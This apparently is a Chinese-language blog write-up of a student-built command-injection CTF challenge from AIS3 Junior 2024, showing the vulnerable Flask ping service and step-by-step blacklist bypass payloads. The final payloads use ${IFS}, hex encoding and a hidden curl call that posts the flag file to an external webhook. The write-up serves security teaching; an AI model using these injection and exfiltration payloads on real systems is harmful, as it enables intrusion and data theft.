
  <!DOCTYPE html>
  <html lang="en"  >
  <head>
  <meta charset="utf-8">
  

  

  

  <script>window.REIMU_CONFIG = {};window.REIMU_CONFIG.icon_font = '4552607_bq08450reo';window.REIMU_CONFIG.clipboard_tips = {"success":"copy success(*^▽^*)","fail":"copy failed (ﾟ⊿ﾟ)ﾂ","copyright":{"enable":false,"count":50,"content":"Naup"}};window.REIMU_CONFIG.code_block = {"expand":true};</script>
  
  <title>
    AIS3 Junior 2024-command injection bypass master |
    
    堇姬 Naup&#39;s Blog
  </title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin><link rel="preload" as="style" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic&display=swap"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic&display=swap" media="print" onload="this.media&#x3D;&#39;all&#39;">
  
    <link rel="preload" href="//at.alicdn.com/t/c/font_4552607_bq08450reo.woff2" as="font" type="font/woff2" crossorigin="anonymous">
  
  
    
<link rel="stylesheet" href="/css/loader.css">

  
  
    <meta name="description" content="AIS3 Junior 2024-command injection bypass master Author: 堇姬Naup  前言這次去AIS3 junior當了助教，也是我第一次當助教，這次跟vincent一起擔任A組的助教，本篇記錄了一些我們學員專題題目，我的解題及vincent的解題方法 學員的專題這次A組的學員挑的專題是針對command injection加入了更多黑名單bypass">
<meta property="og:type" content="article">
<meta property="og:title" content="AIS3 Junior 2024-command injection bypass master">
<meta property="og:url" content="http://example.com/2024/08/19/AIS3-Junior-2024-command-injection-bypass-master/index.html">
<meta property="og:site_name" content="堇姬 Naup&#39;s Blog">
<meta property="og:description" content="AIS3 Junior 2024-command injection bypass master Author: 堇姬Naup  前言這次去AIS3 junior當了助教，也是我第一次當助教，這次跟vincent一起擔任A組的助教，本篇記錄了一些我們學員專題題目，我的解題及vincent的解題方法 學員的專題這次A組的學員挑的專題是針對command injection加入了更多黑名單bypass">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2024/08/19/AIS3-Junior-2024-command-injection-bypass-master/111.png">
<meta property="og:image" content="http://example.com/2024/08/19/AIS3-Junior-2024-command-injection-bypass-master/333.png">
<meta property="og:image" content="http://example.com/2024/08/19/AIS3-Junior-2024-command-injection-bypass-master/111.png">
<meta property="og:image" content="http://example.com/2024/08/19/AIS3-Junior-2024-command-injection-bypass-master/222.jpg">
<meta property="article:published_time" content="2024-08-19T04:07:53.000Z">
<meta property="article:modified_time" content="2024-08-19T04:13:19.146Z">
<meta property="article:author" content="Naup堇姬">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2024/08/19/AIS3-Junior-2024-command-injection-bypass-master/111.png">
  
  
    <link rel="alternate" href="/atom.xml" title="堇姬 Naup's Blog" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/images/fav.ico">
  
  
<link rel="stylesheet" href="/css/style.css">

  <link rel="preload" href="https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
  
  
  
  
    
<script src="https://npm.webcache.cn/pace-js@1.2.4/pace.min.js" integrity="sha384-k6YtvFUEIuEFBdrLKJ3YAUbBki333tj1CSUisai5Cswsg9wcLNaPzsTHDswp4Az8" crossorigin="anonymous"></script>

  
  
    
<link rel="stylesheet" href="https://npm.webcache.cn/@reimujs/aos@0.1.0/dist/aos.css">

  
  
<!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --><meta name="generator" content="Hexo 7.1.1"></head>

  <body>
    
  <div id='loader'>
    <div class="loading-left-bg loading-bg"></div>
    <div class="loading-right-bg loading-bg"></div>
    <div class="spinner-box">
      <div class="loading-taichi">
        
          <svg width="150" height="150" viewBox="0 0 1024 1024" class="icon" version="1.1" xmlns="https://www.w3.org/2000/svg" shape-rendering="geometricPrecision">
            <path d="M303.5 432A80 80 0 0 1 291.5 592A80 80 0 0 1 303.5 432z" fill="var(--red-1, #ff5252)" />
            <path d="M512 65A447 447 0 0 1 512 959L512 929A417 417 0 0 0 512 95A417 417 0 0 0 512 929L512 959A447 447 0 0 1 512 65z 
           M512 95A417 417 0 0 1 929 512A208.5 208.5 0 0 1 720.5 720.5L720.5 592A80 80 0 0 0 720.5 432A80 80 0 0 0 720.5 592L720.5 720.5A208.5 208.5 0 0 1 512 512A208.5 208.5 0 0 0 303.5 303.5A208.5 208.5 0 0 0 95 512A417 417 0 0 1 512 95z" fill="var(--red-1, #ff5252)" />
          </svg>
        
      </div>
      <div class="loading-word">Naup...</div>
    </div>
  </div>
  </div>
  <script>
    var time = null;
    var startLoading = () => {
      time = Date.now();
      document.getElementById('loader').classList.remove("loading");
    }
    var endLoading = () => {
      if (!time) {
        document.body.style.overflow = 'auto';
        document.getElementById('loader').classList.add("loading");
      } else {
        if (Date.now() - time > 500) {
          time = null;
          document.body.style.overflow = 'auto';
          document.getElementById('loader').classList.add("loading");
        } else {
          setTimeout(endLoading, 500 - (Date.now() - time));
          time = null;
        }
      }
    }
    window.addEventListener('DOMContentLoaded', endLoading);
    document.getElementById('loader').addEventListener('click', endLoading);
  </script>

<div id="copy-tooltip" style="pointer-events: none; opacity: 0; transition: all 0.2s ease; position: fixed;top: 50%;left: 50%;z-index: 999;transform: translate(-50%, -50%);color: white;background: rgba(0, 0, 0, 0.5);padding: 10px 15px;border-radius: 10px;">
</div>


    <div id="container">
      <div id="wrap">
        <div id="header-nav">
  <nav id="main-nav">
    
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
            &#xe62b;
          </div>
          <a class="main-nav-link" href="/">Home</a>
        </span>
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
            &#xe62b;
          </div>
          <a class="main-nav-link" href="/archives">Archives</a>
        </span>
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
            &#xe62b;
          </div>
          <a class="main-nav-link" href="/about">About</a>
        </span>
      
    
    <a id="main-nav-toggle" class="nav-icon"></a>
  </nav>
  <nav id="sub-nav">
    
      <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed" target="_blank"></a>
    
    
    
  </nav>
</div>
<header id="header">
  
    <picture>
      
    </picture>
    
      <img fetchpriority="high" src="https://i.imgur.com/OjUqWVO.jpeg" alt="AIS3 Junior 2024-command injection bypass master">
    
  
  <div id="header-outer">
    <div id="header-title">
      
        
        
          <a href="/" id="logo">
            <h1 data-aos="slide-up">AIS3 Junior 2024-command injection bypass master</h1>
          </a>
        
      
      
        
        <h2 id="subtitle-wrap" data-aos="slide-down">
          
        </h2>
      
    </div>
  </div>
</header>

        <div id="content"  class="sidebar-right" >
          <aside id="sidebar">
  
  
  <div class="sidebar-wrapper wrap-sticky">
    <div class="sidebar-wrap" data-aos="fade-up">
      
        <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">Contents</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#AIS3-Junior-2024-command-injection-bypass-master"><span class="toc-number">1.</span> <span class="toc-text">AIS3 Junior 2024-command injection bypass master</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AD%B8%E5%93%A1%E7%9A%84%E5%B0%88%E9%A1%8C"><span class="toc-number">1.2.</span> <span class="toc-text">學員的專題</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Final-payload"><span class="toc-number">1.2.1.</span> <span class="toc-text">Final payload</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#vincent%E7%9A%84payload"><span class="toc-number">1.3.</span> <span class="toc-text">vincent的payload</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A3%93payload"><span class="toc-number">1.4.</span> <span class="toc-text">壓payload</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BE%8C%E8%A8%98"><span class="toc-number">1.5.</span> <span class="toc-text">後記</span></a></li></ol></li></ol>
      
  </div>
</div>
</div>
        <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="Naup堇姬" class="lazyload">
  <div class="sidebar-author-name">Naup堇姬</div>
  <div class="sidebar-description"></div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>Posts</div>
    <div class="sidebar-state-number">58</div>
  </div>
  <div class="sidebar-state-category">
    <div>Categories</div>
    <div class="sidebar-state-number">0</div>
  </div>
  <div class="sidebar-state-tag">
    <div>Tags</div>
    <div class="sidebar-state-number">16</div>
  </div>
</div>
<div class="sidebar-social">
  
    <div class="icon-email sidebar-social-icon">
      <a href=naup96721@gmail.com itemprop="url" target="_blank" aria-label="email" rel="noopener external nofollow noreferrer"></a>
    </div>
  
    <div class="icon-github sidebar-social-icon">
      <a href=https://github.com/Naupjjin itemprop="url" target="_blank" aria-label="github" rel="noopener external nofollow noreferrer"></a>
    </div>
  
</div>
<div class="sidebar-menu">
  
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/" aria-label="Home"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">Home</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/archives" aria-label="Archives"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">Archives</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/about" aria-label="About"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">About</div>
      </div>
    
  
</div>
</div>
      
      
        <div class="sidebar-btn-wrapper" style="position:static">
          <div class="sidebar-toc-btn current"></div>
          <div class="sidebar-common-btn"></div>
        </div>
      
    </div>
  </div>

  <div class="sidebar-widget">
  
  </div>
</aside>

          <section id="main"><article id="post-AIS3-Junior-2024-command-injection-bypass-master" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-inner" data-aos="fade-up">
    <div class="article-meta">
      <div class="article-date">
  <a href="/2024/08/19/AIS3-Junior-2024-command-injection-bypass-master/" class="article-date-link" data-aos="zoom-in">
    <time datetime="2024-08-19T04:07:53.000Z" itemprop="datePublished">2024-08-19</time>
    <time style="display: none;" id="post-update-time">2024-08-19</time>
  </a>
</div>

      

    </div>
    <div class="hr-line"></div>
    

    <div class="e-content article-entry" itemprop="articleBody">
      
      
        <h1 id="AIS3-Junior-2024-command-injection-bypass-master"><a href="#AIS3-Junior-2024-command-injection-bypass-master" class="headerlink" title="AIS3 Junior 2024-command injection bypass master"></a>AIS3 Junior 2024-command injection bypass master</h1><blockquote>
<p>Author: 堇姬Naup</p>
</blockquote>
<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>這次去AIS3 junior當了助教，也是我第一次當助教，這次跟vincent一起擔任A組的助教，本篇記錄了一些我們學員專題題目，我的解題及vincent的解題方法</p>
<h2 id="學員的專題"><a href="#學員的專題" class="headerlink" title="學員的專題"></a>學員的專題</h2><p>這次A組的學員挑的專題是針對command injection加入了更多黑名單bypass的方法，他們出完很開心的拿來給我跟vincent玩，結果我們問他們有沒有官解他們說沒有www，不過這題是真的出的很好</p>
<p>先看source code吧</p>
<p>main</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, render_template, request, redirect, url_for</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line">app.secret_key = os.urandom(<span class="number">32</span>)</span><br><span class="line"></span><br><span class="line">oprBlackList = [<span class="string">&quot; &quot;</span>, <span class="string">&quot;*&quot;</span>, <span class="string">&quot;&amp;&quot;</span>, <span class="string">&quot;||&quot;</span>, <span class="string">&quot;&amp;&amp;&quot;</span>,<span class="string">&quot;?&quot;</span>,<span class="string">&quot;/&quot;</span>,<span class="string">&quot;[&quot;</span>,<span class="string">&quot;]&quot;</span>]</span><br><span class="line">cmdBlackList = [<span class="string">&quot;cat&quot;</span>, <span class="string">&quot;ls&quot;</span>, <span class="string">&quot;whoami&quot;</span>, <span class="string">&quot;bash&quot;</span>, <span class="string">&quot;cd&quot;</span>, <span class="string">&quot;awk&quot;</span>, <span class="string">&quot;curl&quot;</span>,<span class="string">&quot;A&quot;</span>,<span class="string">&quot;a&quot;</span>]</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&quot;/&quot;</span>, methods=[<span class="string">&quot;GET&quot;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line">    <span class="keyword">return</span> render_template(<span class="string">&quot;index.html&quot;</span>, inlinePage=render_template(<span class="string">&quot;card.html&quot;</span>, message=render_template(<span class="string">&quot;post.html&quot;</span>)))</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&quot;/&quot;</span>, methods=[<span class="string">&quot;POST&quot;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">exec_command</span>():</span><br><span class="line">    ip = request.form.get(<span class="string">&quot;ip&quot;</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">any</span>(opr <span class="keyword">in</span> ip <span class="keyword">for</span> opr <span class="keyword">in</span> oprBlackList) <span class="keyword">or</span> <span class="built_in">any</span>(cmd <span class="keyword">in</span> ip <span class="keyword">for</span> cmd <span class="keyword">in</span> cmdBlackList)):</span><br><span class="line">        <span class="keyword">return</span> render_template(<span class="string">&quot;index.html&quot;</span>, inlinePage=render_template(<span class="string">&quot;card.html&quot;</span>, message=render_template(<span class="string">&quot;post.html&quot;</span>), result=<span class="string">&quot;DANGER : \nDetected that the command line contains blacklist elements&quot;</span>))</span><br><span class="line"></span><br><span class="line">    command = <span class="string">f&quot;ping -c 1 <span class="subst">&#123;ip&#125;</span> 2&gt;&amp;1&quot;</span></span><br><span class="line">    <span class="built_in">print</span>(command)</span><br><span class="line">    result = os.popen(command).read()</span><br><span class="line">    <span class="built_in">print</span>(result)</span><br><span class="line">    <span class="keyword">if</span> <span class="string">&quot;Name or service not known&quot;</span> <span class="keyword">in</span> result : <span class="keyword">return</span> render_template(<span class="string">&quot;index.html&quot;</span>, inlinePage=render_template(<span class="string">&quot;card.html&quot;</span>, message=render_template(<span class="string">&quot;post.html&quot;</span>), result=<span class="string">&quot;ERROR : \n&quot;</span> + result))</span><br><span class="line">    <span class="keyword">else</span> : <span class="keyword">return</span> render_template(<span class="string">&quot;index.html&quot;</span>, inlinePage=render_template(<span class="string">&quot;card.html&quot;</span>, message=render_template(<span class="string">&quot;post.html&quot;</span>), result=<span class="string">&quot;EVERY THING IS GOOD&quot;</span>))</span><br><span class="line">    </span><br><span class="line">    </span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    app.run(host=<span class="string">&quot;0.0.0.0&quot;</span>,port=<span class="number">8012</span>, debug=<span class="literal">False</span>)</span><br><span class="line"> </span><br></pre></td></tr></table></figure>

<p>他ban掉了一些字元，但可以bypass</p>
<p>首先是cat ls cd whoami這些字元其實都是可以透過在中間加入一個${x}來bypass的</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">c$&#123;x&#125;at</span><br></pre></td></tr></table></figure>

<p>再來我覺得比較麻煩的ban掉了A跟a，會影響到cat、base64甚至是後續利用網址有a的問題</p>
<p>另外像是?跟&#x2F;這兩個字被ban，也影響到後續我使用curl手法來收flag(因為網址有&#x2F;，GET request有?)</p>
<p>而我這邊挑選bypass的方法是xxd，也就是將輸出的字在ASCII跟hex間做轉換</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">xxd -r -p //hex to ASCII</span><br><span class="line">xxd -p // ASCII to hex</span><br></pre></td></tr></table></figure>

<p>再來是因為xxd轉hex有時候會產生’\n’，所以我透過tr -d來刪除換行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tr -d &#x27;\n&#x27;</span><br></pre></td></tr></table></figure>
<p>再來空格就老方法${IFS}</p>
<p>我們來嘗試開串吧</p>
<p>首先我們最需要考慮的是，怎麼讀檔案，因為a被禁用，所以不能用echo來讀，那我們可以去這個網站逛逛</p>
<p><a target="_blank" rel="noopener" href="https://gtfobins.github.io/">https://gtfobins.github.io/</a></p>
<p>這個網站上有很多command read file一些trick<br>最後我突然想到可以用strings來印出檔案裡面的東西，所以先串</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">strings$&#123;IFS&#125;FLAG</span><br></pre></td></tr></table></figure>
<p>然後就會發現FLAG的A被blacklist掉，所以採用hex的方案來解決，把FLAG轉hex，再用xxd轉回ASCII造出FLAG</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo$&#123;IFS&#125;&#x27;464c4147&#x27;$&#123;IFS&#125;|$&#123;IFS&#125;xxd$&#123;IFS&#125;-r$&#123;IFS&#125;-p)</span><br></pre></td></tr></table></figure>
<p>再來丟到strings讀<br>變成</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$(strings$&#123;IFS&#125;$(echo$&#123;IFS&#125;&#x27;464c4147&#x27;$&#123;IFS&#125;|$&#123;IFS&#125;xxd$&#123;IFS&#125;-r$&#123;IFS&#125;-p))</span><br></pre></td></tr></table></figure>
<p>這樣就可以讀FLAG，但是會發現一件很尷尬的事，因為FLAG這份檔案用了摩斯密碼進行加密，內容的<code>-.</code>被當成參數，導致ping直接噴錯，所以我嘗試印出FLAG後再進行一次hex</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$(echo$&#123;IFS&#125;$(strings$&#123;IFS&#125;$(echo$&#123;IFS&#125;&#x27;464c4147&#x27;$&#123;IFS&#125;|$&#123;IFS&#125;xxd$&#123;IFS&#125;-r$&#123;IFS&#125;-p))|$&#123;IFS&#125;xxd$&#123;IFS&#125;-p|tr$&#123;IFS&#125;-d$&#123;IFS&#125;&#x27;\n&#x27;)</span><br></pre></td></tr></table></figure>
<p>然後就解…了嗎?</p>
<img src="/2024/08/19/AIS3-Junior-2024-command-injection-bypass-master/111.png" class="">

<p>居然被當正常的輸入ping成功了，沒有噴錯<br>所以並沒有進到</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> <span class="string">&quot;Name or service not known&quot;</span> <span class="keyword">in</span> result : <span class="keyword">return</span> render_template(<span class="string">&quot;index.html&quot;</span>, inlinePage=render_template(<span class="string">&quot;card.html&quot;</span>, message=render_template(<span class="string">&quot;post.html&quot;</span>), result=<span class="string">&quot;ERROR : \n&quot;</span> + result))</span><br></pre></td></tr></table></figure>

<p>來把我們想要的結果印出來<br>我嘗試try了許多方法，像是塞入空格或是特殊字元，讓ping噴出<code>Name or service not known</code>，但都失敗了</p>
<p>最後我採用了curl的方式將我們的FLAG送出來<br>同樣的觀察webhook網址使用了<code>/</code>，但我發現一樣可以使用hex來解決，所以這邊先把webhook網址hex</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">68747470733A2F2F776562686F6F6B2E736974652F63363266373331632D333264312D346563392D383033652D393237323839393462306139</span><br></pre></td></tr></table></figure>
<p>but，<code>:</code>這個hex結果是<code>3A</code>，又有A，所以一樣有問題，想了一下發現，hex一次不行，那我就double hex就好了，所以最後產生出webhook網址的方式是</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$(echo$&#123;IFS&#125;&#x27;3638373437343730373333613266326637373635363236383666366636623265373336393734363532663633333633323636333733333331363332643333333236343331326433343635363333393264333833303333363532643339333233373332333833393339333436323330363133393061&#x27;$&#123;IFS&#125;|$&#123;IFS&#125;xxd$&#123;IFS&#125;-r$&#123;IFS&#125;-p$&#123;IFS&#125;|$&#123;IFS&#125;xxd$&#123;IFS&#125;-r$&#123;IFS&#125;-p)</span><br></pre></td></tr></table></figure>
<p>最後用curl直接送出FLAG內容就可以了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$(cu$&#123;x&#125;rl$&#123;IFS&#125;$(echo$&#123;IFS&#125;&#x27;3638373437343730373333613266326637373635363236383666366636623265373336393734363532663633333633323636333733333331363332643333333236343331326433343635363333393264333833303333363532643339333233373332333833393339333436323330363133393061&#x27;$&#123;IFS&#125;|$&#123;IFS&#125;xxd$&#123;IFS&#125;-r$&#123;IFS&#125;-p$&#123;IFS&#125;|$&#123;IFS&#125;xxd$&#123;IFS&#125;-r$&#123;IFS&#125;-p)$&#123;IFS&#125;-X$&#123;IFS&#125;POST$&#123;IFS&#125;-d$&#123;IFS&#125;$(echo$&#123;IFS&#125;$(strings$&#123;IFS&#125;$(echo$&#123;IFS&#125;&#x27;464c4147&#x27;$&#123;IFS&#125;|$&#123;IFS&#125;xxd$&#123;IFS&#125;-r$&#123;IFS&#125;-p))|$&#123;IFS&#125;xxd$&#123;IFS&#125;-p|tr$&#123;IFS&#125;-d$&#123;IFS&#125;&#x27;\n&#x27;))</span><br></pre></td></tr></table></figure>

<p>收到FLAG的內容</p>
<img src="/2024/08/19/AIS3-Junior-2024-command-injection-bypass-master/333.png" class="">

<p>這樣就成功了…嗎?</p>
<img src="/2024/08/19/AIS3-Junior-2024-command-injection-bypass-master/111.png" class="">


<p>我們嘗試解密</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.. .----. -- / .- / -... .- -.. / .... .- -.-. -.- . .-. --..-- / .--. .-.. . .- ... . / ... . . / .-..-. .-.-.- ..-. .-.. .- --. .-..-.</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">I&#x27;M A BAD HACKER, PLEASE SEE &quot;.FLAG&quot;</span><br></pre></td></tr></table></figure>

<p>這裡的巧思很好，由於ban掉了a，導致ls不會印出<code>.FLAG</code>這個檔案，下意識就會去印FLAG，而摩斯密碼在印出的時候會遇到許多問題，總之就把上述payload的FLAG改成.FLAG就可以解了</p>
<h3 id="Final-payload"><a href="#Final-payload" class="headerlink" title="Final payload"></a>Final payload</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$(cu$&#123;x&#125;rl$&#123;IFS&#125;$(echo$&#123;IFS&#125;&#x27;3638373437343730373333613266326637373635363236383666366636623265373336393734363532663633333633323636333733333331363332643333333236343331326433343635363333393264333833303333363532643339333233373332333833393339333436323330363133393061&#x27;$&#123;IFS&#125;|$&#123;IFS&#125;xxd$&#123;IFS&#125;-r$&#123;IFS&#125;-p$&#123;IFS&#125;|$&#123;IFS&#125;xxd$&#123;IFS&#125;-r$&#123;IFS&#125;-p)$&#123;IFS&#125;-X$&#123;IFS&#125;POST$&#123;IFS&#125;-d$&#123;IFS&#125;$(strings$&#123;IFS&#125;$(echo$&#123;IFS&#125;&#x27;2e464c4147&#x27;$&#123;IFS&#125;|$&#123;IFS&#125;xxd$&#123;IFS&#125;-r$&#123;IFS&#125;-p)))</span><br></pre></td></tr></table></figure>
<h2 id="vincent的payload"><a href="#vincent的payload" class="headerlink" title="vincent的payload"></a>vincent的payload</h2><p>vincent作法是，因為ping沒有輸出<code>Name or service not known</code>，所以我們就echo自己印，一樣用hex再用xxd轉回來輸出，來成功輸出FLAG</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;$(echo$&#123;IFS&#125;&#x27;4e616d65206f722073657276696365206e6f74206b6e6f776e&#x27;|xxd$&#123;IFS&#125;-r$&#123;IFS&#125;-p)$(strings$&#123;IFS&#125;`echo$&#123;IFS&#125;&#x27;2e464c4147&#x27;|xxd$&#123;IFS&#125;-r$&#123;IFS&#125;-p`|xxd$&#123;IFS&#125;-p)&quot;</span><br></pre></td></tr></table></figure>

<h2 id="壓payload"><a href="#壓payload" class="headerlink" title="壓payload"></a>壓payload</h2><p>那時候跟vincent討論是不是可以把payload壓短，然後上長度限制，最後把長度壓到了132</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;$(&#123;echo,&#x27;4e616d65206f722073657276696365206e6f74206b6e6f776e&#x27;&#125;|&#123;xxd,-r,-p&#125;)$(strings$IFS`&#123;echo,&#x27;2e464c4147&#x27;&#125;|&#123;xxd,-r,-p&#125;`|&#123;xxd,-p&#125;)&quot;</span><br></pre></td></tr></table></figure>

<p>使用大括號可以省掉很多${IFS}</p>
<p>最後總結我們的bypass技巧</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">curl -&gt; 在ping之前就curl出去</span><br><span class="line">$() -&gt; 用來執行</span><br><span class="line">$&#123;x&#125; -&gt; 繞 curl 等blacklist bypass</span><br><span class="line">$&#123;IFS&#125; -&gt; 空格bypass</span><br><span class="line">xxd -&gt; ASCII跟十六進制間轉換</span><br><span class="line">strings -&gt; the 讀 FLAG</span><br><span class="line">tr -d ‘\n’ -&gt; 把換行拔掉</span><br><span class="line">直接echoh錯誤訊息</span><br><span class="line">&#123;&#125; -&gt; 包住指令節省空白符</span><br></pre></td></tr></table></figure>

<h2 id="後記"><a href="#後記" class="headerlink" title="後記"></a>後記</h2><p>最後放張圖，當助教好好玩ww(熊熊是vincent的)</p>
<img src="/2024/08/19/AIS3-Junior-2024-command-injection-bypass-master/222.jpg" class="">


      
    </div>
    <footer class="article-footer">
      
      
      
      
      
      
      
      
      

    </footer>
  </div>
  
  <nav id="article-nav" data-aos="fade-up">
    
      <div class="article-nav-link-wrap article-nav-link-left">
        
          
          
            <img data-src="https://i.imgur.com/OjUqWVO.jpeg" data-sizes="auto" alt="Pwnable.tw-hacknote" class="lazyload">
          
        
        <a href="/2024/08/20/Pwnable-hacknote/"></a>
        <div class="article-nav-caption">Newer</div>
        <h3 class="article-nav-title">
          
            Pwnable.tw-hacknote
          
        </h3>
      </div>
    
    
    <div class="article-nav-link-wrap article-nav-link-right">
      
        
        
          <img data-src="https://i.imgur.com/OjUqWVO.jpeg" data-sizes="auto" alt="Pwn-SROP" class="lazyload">
        
      
      <a href="/2024/08/12/Pwn-SROP/"></a>
      <div class="article-nav-caption">Older</div>
      <h3 class="article-nav-title">
        
          Pwn-SROP
        
      </h3>
    </div>
    
  </nav>


</article>






</section>
        </div>
        
        
        <footer id="footer">
  <div style="width: 100%; overflow: hidden">
    <div class="footer-line"></div>
  </div>
  <div id="footer-info">
    
    <div>
      <span class="icon-copyright"></span>
      2020-2025
      <span class="footer-info-sep rotate"></span>
      Naup堇姬
    </div>
    
      <div>
        Powered by&nbsp;<a href="https://hexo.io/" rel="noopener external nofollow noreferrer" target="_blank">Hexo</a>&nbsp;
        Theme.<a href="https://github.com/D-Sketon/hexo-theme-reimu" rel="noopener external nofollow noreferrer" target="_blank">Reimu</a>
      </div>
    
    
      <div>
        <span class="icon-brush"></span>
        151k
        &nbsp;|&nbsp;
        <span class="icon-coffee"></span>
        13:16
      </div>
    
    
    
    
      <div>
        <span class="icon-eye"></span>
        <span id="busuanzi_container_site_pv">Number of visits&nbsp;<span id="busuanzi_value_site_pv"></span></span>
        &nbsp;|&nbsp;
        <span class="icon-user"></span>
